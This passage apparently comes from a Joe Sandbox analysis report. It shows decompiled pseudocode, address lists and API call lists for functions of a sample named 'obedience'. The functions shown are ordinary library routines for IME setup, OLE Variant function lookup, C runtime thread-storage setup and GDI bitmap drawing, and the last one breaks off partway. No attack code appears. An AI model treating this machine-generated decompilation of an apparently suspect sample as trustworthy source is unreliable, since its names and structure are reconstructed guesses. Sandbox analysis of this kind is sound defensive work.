					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x490b30 == 0) {
						 *0x490b30 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x48ed04 == 0) {
						 *0x48ed04 = LoadLibraryA("imm32.dll");
						if( *0x48ed04 != 0) {
							_t11 =  *0x48ed04; // 0x0
							 *0x490b34 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x48ed04; // 0x0
							 *0x490b38 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x48ed04; // 0x0
							 *0x490b3c = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x48ed04; // 0x0
							 *0x490b40 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x48ed04; // 0x0
							 *0x490b44 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x48ed04; // 0x0
							 *0x490b48 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x48ed04; // 0x0
							 *0x490b4c = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x48ed04; // 0x0
							 *0x490b50 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x48ed04; // 0x0
							 *0x490b54 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x48ed04; // 0x0
							 *0x490b58 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x44fd35);
					return SetErrorMode(_v8);
				}
			}


















      0x0044fbc9
      0x0044fbcd
      0x0044fbd6
      0x0044fd38
      0x0044fbdc
      0x0044fbe6
      0x0044fbeb
      0x0044fbec
      0x0044fbf1
      0x0044fbf4
      0x0044fbfe
      0x0044fc17
      0x0044fc17
      0x0044fc23
      0x0044fc33
      0x0044fc3f
      0x0044fc4a
      0x0044fc55
      0x0044fc5f
      0x0044fc6a
      0x0044fc74
      0x0044fc7f
      0x0044fc89
      0x0044fc94
      0x0044fc9e
      0x0044fca9
      0x0044fcb3
      0x0044fcbe
      0x0044fcc8
      0x0044fcd3
      0x0044fcdd
      0x0044fce8
      0x0044fcf2
      0x0044fcfd
      0x0044fd07
      0x0044fd12
      0x0044fd12
      0x0044fc3f
      0x0044fd19
      0x0044fd1c
      0x0044fd1f
      0x0044fd2d
      0x0044fd2d

      APIs
      • SetErrorMode.KERNEL32(00008000), ref: 0044FBE1
      • GetModuleHandleA.KERNEL32(USER32,00000000,0044FD2E,?,00008000), ref: 0044FC05
      • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044FC12
      • LoadLibraryA.KERNEL32(imm32.dll,00000000,0044FD2E,?,00008000), ref: 0044FC2E
      • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044FC50
      • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 0044FC65
      • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044FC7A
      • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044FC8F
      • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 0044FCA4
      • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 0044FCB9
      • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044FCCE
      • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044FCE3
      • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044FCF8
      • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0044FD0D
      • SetErrorMode.KERNEL32(?,0044FD35,00008000), ref: 0044FD28
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
      • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
      • API String ID: 3397921170-3950384806
      • Opcode ID: 374a837e80c477fb98822c23aae7332e2a59bf68874875d1c8d2069295e67134
      • Instruction ID: 4bfc3634d294958175ea73f6866045fa44debc043b9f55035c6037df43ab569d
      • Opcode Fuzzy Hash: 374a837e80c477fb98822c23aae7332e2a59bf68874875d1c8d2069295e67134
      • Instruction Fuzzy Hash: 213133F1D043056EE700EFA2FD5AE1A77E4E714708F20483BB505972A2D6BD68088B5E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040F2CC Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040F2CC() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4907a0 = E0040F294("VariantChangeTypeEx", E0040EE30, _t91);
				 *0x4907a4 = E0040F294("VarNeg", E0040EE60, _t91);
				 *0x4907a8 = E0040F294("VarNot", E0040EE60, _t91);
				 *0x4907ac = E0040F294("VarAdd", E0040EE6C, _t91);
				 *0x4907b0 = E0040F294("VarSub", E0040EE6C, _t91);
				 *0x4907b4 = E0040F294("VarMul", E0040EE6C, _t91);
				 *0x4907b8 = E0040F294("VarDiv", E0040EE6C, _t91);
				 *0x4907bc = E0040F294("VarIdiv", E0040EE6C, _t91);
				 *0x4907c0 = E0040F294("VarMod", E0040EE6C, _t91);
				 *0x4907c4 = E0040F294("VarAnd", E0040EE6C, _t91);
				 *0x4907c8 = E0040F294("VarOr", E0040EE6C, _t91);
				 *0x4907cc = E0040F294("VarXor", E0040EE6C, _t91);
				 *0x4907d0 = E0040F294("VarCmp", E0040EE78, _t91);
				 *0x4907d4 = E0040F294("VarI4FromStr", E0040EE84, _t91);
				 *0x4907d8 = E0040F294("VarR4FromStr", E0040EEF0, _t91);
				 *0x4907dc = E0040F294("VarR8FromStr", E0040EF5C, _t91);
				 *0x4907e0 = E0040F294("VarDateFromStr", E0040EFC8, _t91);
				 *0x4907e4 = E0040F294("VarCyFromStr", E0040F034, _t91);
				 *0x4907e8 = E0040F294("VarBoolFromStr", E0040F0A0, _t91);
				 *0x4907ec = E0040F294("VarBstrFromCy", E0040F120, _t91);
				 *0x4907f0 = E0040F294("VarBstrFromDate", E0040F190, _t91);
				_t46 = E0040F294("VarBstrFromBool", E0040F200, _t91);
				 *0x4907f4 = _t46;
				return _t46;
			}






      0x0040f2da
      0x0040f2ee
      0x0040f304
      0x0040f31a
      0x0040f330
      0x0040f346
      0x0040f35c
      0x0040f372
      0x0040f388
      0x0040f39e
      0x0040f3b4
      0x0040f3ca
      0x0040f3e0
      0x0040f3f6
      0x0040f40c
      0x0040f422
      0x0040f438
      0x0040f44e
      0x0040f464
      0x0040f47a
      0x0040f490
      0x0040f4a6
      0x0040f4b6
      0x0040f4bc
      0x0040f4c3

      APIs
      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F2D5
        • Part of subcall function 0040F294: GetProcAddress.KERNEL32(00000000), ref: 0040F2B2
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
      • API String ID: 1646373207-1918263038
      • Opcode ID: 58de1dade71f53d0899f0e8fbc1cbb2eb4c9aef06b4d33c591fb82ccc709756d
      • Instruction ID: 28b5129e273cb11d93a915464337d558d712fca8657309680c3e7c11d0cc13c2
      • Opcode Fuzzy Hash: 58de1dade71f53d0899f0e8fbc1cbb2eb4c9aef06b4d33c591fb82ccc709756d
      • Instruction Fuzzy Hash: DA412D655083046ED324ABAEB80142677C9D6547243A0C4BFB404BBFD6DB3D7C4A8E6D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED98473 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 62%
      			E6ED98473(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x6edb0880 = GetProcAddress(_t36, "FlsAlloc");
					 *0x6edb0884 = GetProcAddress(_t36, "FlsGetValue");
					 *0x6edb0888 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x6edb0880;
					_t40 = TlsSetValue;
					 *0x6edb088c = _t7;
					if( *0x6edb0880 == 0) {
						L6:
						 *0x6edb0884 = TlsGetValue;
						 *0x6edb0880 = 0x6ed98115;
						 *0x6edb0888 = _t40;
						 *0x6edb088c = TlsFree;
					} else {
						__eflags =  *0x6edb0884;
						if( *0x6edb0884 == 0) {
							goto L6;
						} else {
							__eflags =  *0x6edb0888;
							if( *0x6edb0888 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x6edafa20 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x6edb0884);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E6ED967F1();
							_t42 = __imp__EncodePointer;
							_t14 =  *_t42( *0x6edb0880);
							 *0x6edb0880 = _t14;
							_t15 =  *_t42( *0x6edb0884);
							 *0x6edb0884 = _t15;
							_t16 =  *_t42( *0x6edb0888);
							 *0x6edb0888 = _t16;
							 *0x6edb088c =  *_t42( *0x6edb088c);
							_t18 = L6ED9990E();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								L6ED98152();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t37()))( *0x6edb0880, E6ED982D6);
								 *0x6edafa1c = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E6ED99841(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t37()))( *0x6edb0888,  *0x6edafa1c, _t43);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											L6ED9818F(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					L6ED98152();
					return 0;
				}
			}






















      0x6ed98473
      0x6ed98473
      0x6ed98481
      0x6ed98485
      0x6ed984a5
      0x6ed984b2
      0x6ed984bf
      0x6ed984c4
      0x6ed984c6
      0x6ed984cd
      0x6ed984d3
      0x6ed984d8
      0x6ed984f0
      0x6ed984f5
      0x6ed984ff
      0x6ed98509
      0x6ed9850f
      0x6ed984da
      0x6ed984da
      0x6ed984e1
      0x00000000
      0x6ed984e3
      0x6ed984e3
      0x6ed984ea
      0x00000000
      0x6ed984ec
      0x6ed984ec
      0x6ed984ee
      0x00000000
      0x00000000
      0x6ed984ee
      0x6ed984ea
      0x6ed984e1
      0x6ed98514
      0x6ed9851a
      0x6ed9851f
      0x6ed98522
      0x6ed985e9
      0x6ed985e9
      0x6ed985e9
      0x6ed98528
      0x6ed9852f
      0x6ed98531
      0x6ed98533
      0x00000000
      0x6ed98539
      0x6ed98539
      0x6ed98544
      0x6ed9854a
      0x6ed98552
      0x6ed98557
      0x6ed9855f
      0x6ed98564
      0x6ed9856c
      0x6ed98573
      0x6ed98578
      0x6ed9857d
      0x6ed9857f
      0x6ed985e4
      0x6ed985e4
      0x00000000
      0x6ed98581
      0x6ed98581
      0x6ed98594
      0x6ed98596
      0x6ed9859b
      0x6ed9859e
      0x00000000
      0x6ed985a0
      0x6ed985ac
      0x6ed985b0
      0x6ed985b2
      0x00000000
      0x6ed985b4
      0x6ed985c5
      0x6ed985c7
      0x00000000
      0x6ed985c9
      0x6ed985c9
      0x6ed985cb
      0x6ed985cc
      0x6ed985d3
      0x6ed985d9
      0x6ed985dd
      0x6ed985e1
      0x6ed985e1
      0x6ed985c7
      0x6ed985b2
      0x6ed9859e
      0x6ed9857f
      0x6ed98533
      0x6ed985ed
      0x6ed98487
      0x6ed98487
      0x6ed9848f
      0x6ed9848f

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9847B
      • __mtterm.LIBCMT ref: 6ED98487
        • Part of subcall function 6ED98152: DecodePointer.KERNEL32(00000005,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98163
        • Part of subcall function 6ED98152: TlsFree.KERNEL32(00000020,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9817D
        • Part of subcall function 6ED98152: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED99975
        • Part of subcall function 6ED98152: _free.LIBCMT ref: 6ED99978
        • Part of subcall function 6ED98152: DeleteCriticalSection.KERNEL32(00000020,?,?,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9999F
      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6ED9849D
      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6ED984AA
      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6ED984B7
      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6ED984C4
      • TlsAlloc.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98514
      • TlsSetValue.KERNEL32(00000000,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9852F
      • __init_pointers.LIBCMT ref: 6ED98539
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9854A
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98557
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98564
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98571
      • DecodePointer.KERNEL32(Function_000082D6,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98592
      • __calloc_crt.LIBCMT ref: 6ED985A7
      • DecodePointer.KERNEL32(00000000,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED985C1
      • GetCurrentThreadId.KERNEL32 ref: 6ED985D3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
      • API String ID: 3698121176-3819984048
      • Opcode ID: 93f15c975f6924734934168e9766d48556946d640a21cbe46a4281b267be9624
      • Instruction ID: b646a616cd99eca07b226c7d31acd3d8e1a2232270e2b455aa5ed5ac8db6e13d
      • Opcode Fuzzy Hash: 93f15c975f6924734934168e9766d48556946d640a21cbe46a4281b267be9624
      • Instruction Fuzzy Hash: 3F3180B9810B01DAEF95BFB8CD0460D3AE5EF46790B10052AE424DB290FBB0C247EF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042709C Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
      Download Yara Rule
      C-Code - Quality: 52%
      			E0042709C(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x48f9d4; // 0x48e0c8
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00407280();
					_v20 = E00426EF8(0);
					_push(_t177);
					_push(0x42731c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00407278();
					_v24 = E00426EF8(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x490890; // 0xc0809fd
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00407420();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00407420();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x490890; // 0xc0809fd
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00407420();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00407420();
						_v40 = _t135;
					}
					_push(_v20);
					L004073F0();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x427323);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00407420();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00407278();
					_v24 = E00426EF8(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x42716f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A7C(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x427323);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























      0x0042709d
      0x0042709f
      0x004270a5
      0x004270a8
      0x004270ab
      0x004270ad
      0x004270b0
      0x004270b3
      0x004270b7
      0x004270bf
      0x00427178
      0x0042717b
      0x0042717d
      0x00427187
      0x0042718c
      0x0042718d
      0x00427192
      0x00427195
      0x00427198
      0x00427199
      0x0042719d
      0x0042719e
      0x004271a8
      0x004271b8
      0x004271bb
      0x004271bd
      0x004271c2
      0x004271c3
      0x004271c6
      0x004271c7
      0x004271cc
      0x004271cf
      0x004271d4
      0x004271d8
      0x004271d9
      0x004271e2
      0x004271f8
      0x004271fa
      0x004271ff
      0x00427200
      0x00427203
      0x00427204
      0x00427209
      0x004271e4
      0x004271e4
      0x004271e9
      0x004271ea
      0x004271ed
      0x004271ee
      0x004271f3
      0x004271f3
      0x0042720f
      0x00427210
      0x00427232
      0x00427254
      0x00427261
      0x0042726f
      0x00427296
      0x004272bb
      0x004272c5
      0x004272cf
      0x004272d8
      0x004272e2
      0x004272e2
      0x004272eb
      0x004272f2
      0x004272f5
      0x004272f8
      0x00427301
      0x00427303
      0x00427308
      0x0042730c
      0x0042730d
      0x0042730d
      0x0042731b
      0x004270d7
      0x004270d7
      0x004270d9
      0x004270de
      0x004270df
      0x004270e9
      0x004270f9
      0x004270fe
      0x004270ff
      0x00427104
      0x00427107
      0x00427143
      0x0042714a
      0x0042714d
      0x00427150
      0x00427162
      0x0042716e
      0x0042716e

      APIs
      • 73BEA520.GDI32(?,00000001,00000001), ref: 004270DF
      • SelectObject.GDI32(?,?), ref: 004270F4
      • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0042716F,?,?), ref: 00427143
      • SelectObject.GDI32(?,?), ref: 0042715D
      • DeleteObject.GDI32(?), ref: 00427169
      • 73BEA590.GDI32(00000000), ref: 0042717D
      • 73BEA520.GDI32(?,?,?,00000000,0042731C,?,00000000), ref: 0042719E
      • SelectObject.GDI32(?,?), ref: 004271B3
      • 73BEB410.GDI32(?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C,?,00000000), ref: 004271C7
      • 73BEB410.GDI32(?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C,?,00000000), ref: 004271D9
      • 73BEB410.GDI32(?,00000000,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C), ref: 004271EE
      • 73BEB410.GDI32(?,0C0809FD,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C), ref: 00427204
      • 73BEB150.GDI32(?,?,0C0809FD,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000), ref: 00427210
      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00427232
      • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00427254
      • SetTextColor.GDI32(?,00000000), ref: 0042725C
      • SetBkColor.GDI32(?,00FFFFFF), ref: 0042726A
      • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00427296
      • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 004272BB
      • SetTextColor.GDI32(?,?), ref: 004272C5
      • SetBkColor.GDI32(?,?), ref: 004272CF
      • SelectObject.GDI32(?,00000000), ref: 004272E2
      • DeleteObject.GDI32(?), ref: 004272EB
      • 73BEB410.GDI32(?,00000000,00000000,00427323,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0042730D
      • DeleteDC.GDI32(?), ref: 00427316
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
      • String ID:
      • API String ID: 3348367721-0
      • Opcode ID: 257c1dc1462feeed0328854930f008e6ef21866e43d843eaa150e9b4d6bb5ac8
      • Instruction ID: 7fab5b141c4dc2b1aadbdaab5ff2f1302420b01c5a1f78798022a214eff543e4
      • Opcode Fuzzy Hash: 257c1dc1462feeed0328854930f008e6ef21866e43d843eaa150e9b4d6bb5ac8
      • Instruction Fuzzy Hash: F981A8B1A04219AFDB50EF99CC85EAF77FCAB0D354F510569F618F7281C638AD008B65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042A70C Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
      Download Yara Rule
      C-Code - Quality: 51%
      			E0042A70C(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
